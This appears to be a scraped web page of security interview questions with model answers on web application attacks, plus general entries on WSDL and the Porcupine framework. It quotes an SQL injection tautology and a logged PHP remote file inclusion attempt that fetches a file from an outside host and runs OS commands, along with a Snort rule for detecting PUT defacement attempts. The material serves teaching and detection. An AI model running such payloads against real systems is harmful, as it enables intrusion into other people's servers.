soloscript.com
Home | Contact Us | Log In | Help
HOME New Listing Script NEW LISTING Most Popular Script MOST POPULAR High Rated Script HIGHEST RATED Script SCRIPTS Add Script ADD SCRIPT Download Tutorial DOWNLOADS Forums FORUM
TUTORIALS
   ASP.Net & C#
   ASP
   Perl and PHP
   Java Scripts
   C and C++
   Ajax Tutorials
   J2ee, J2Me, Java
   Python & Ruby Rail
   Crystal Report
   Sap
   CGI
   XML
   Cold Fusion & CFML
   HTML, DHTML & CSS
   Dreamweaver
   FLASH
   Photoshop/Web Designing
   Tools & Utilities
   Oracle/D2K
   Sql Server
   MySql
   Domain Name Registration
   Remotely Hosting
   Web/Server Application
   Hotel Marketing
   Internet and Law
   Search Engine Optimization/SEO
   E-Commerce
   Interview Questions
   Site Map

Previous < 1 2 3 4 5 6 > Next

Web Server Application 2
 You are engaged in a penetration-test where you are attempting to gain access to a protected location. You are presented with this login screen:

   
 What are some examples of you how you would attempt to gain access?

Determine if the applicant has a wide knowledge of different authentication vulnerabilities. They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as OR 1=1#). If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.
Data Source = "ECommerceTheArchSupport2" SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is:
K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM
This error message indicates that the target web application if running Microsoft SQL and discloses directory structures.

 
 What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20a"
at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
Goal of question to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:
  * The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
  * The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.

 
 One of your web servers is logging multiple requests similar to the following:

201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.html HTTP/1.0 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"

 
 What does this log entry indicate? How could you identify what the contents are of the "hacked.html" file that the attacker is trying to upload?

Goal of this questions is determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT Method), as well as, the logging limitations of CLF. In this type of attack, the defacement text is sent in the request body and not on the URL Request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)

 
 What is WSDL?

WSDL is an XML format for describing network services as a set of endpoints operating on messages containing either document-oriented or procedure-oriented information. The operations and messages are described abstractly, and then bound to a concrete network protocol and message format to define an endpoint. Related concrete endpoints are combined into abstract endpoints (services).
(Source: www.w3.org).

 
 What is Porcupine?
Porcupine is a web application server that provides an object oriented framework for developing web applications rapidly.
Many of the tasks required for building web applications as you know them, are either eliminated or simplified. For instance, when developing a Porcupine application you don't have to design a relational database. You only have to design and implement your business objects as classes, using the building blocks provided by the framework (datatypes). Porcupine integrates a native object database, no mapping required.
Generally, every Porcupine application consists of three distinct layers. The first is the business layer consisting of the business objects which encapsulate the business logic. The second layer binds the HTTP protocol with the first layer's business objects. This layer is implemented using Python Server Pages or Servlets. If using XML-RPC, one common approach is to directly map an XML-RPC method to a business object's method. The third layer, the presentation layer, usually consists of XML UI definitions and JavaScript event handlers. The first two layers are executed server side and the third layer is executed on the client (browser).
 
 How can you work Porcupine Web Connectors?

The "pocupine.exe" file of the CGI connector and the "porcupine.py" of the MOD_PYTHON connector need to be located on the web server's document root folder, and not in a subfolder like "cgi-bin" or "porcupine".
We will remove this limitation in future releases.
If you are using the CGI connector this requires some extra actions in order for the web server to execute "porcupine.exe".
On IIS:
Open the IIS administration console. Open the "Default Web Site" properties.
On the "Home Directory" tab, locate the Execute Permissions setting and select "Scripts and Executables".
On Apache:
Open the apache "httpd.conf" file. Locate the "ScriptAlias" directives. Add the following directive: ScriptAlias /porcupine.exe "[YOUR PATH TO porcupine.exe]"

   

Previous < 1 2 3 4 5 6 > Next

  Copyright 2000-2006 © SoloScript.com, All rights reserved.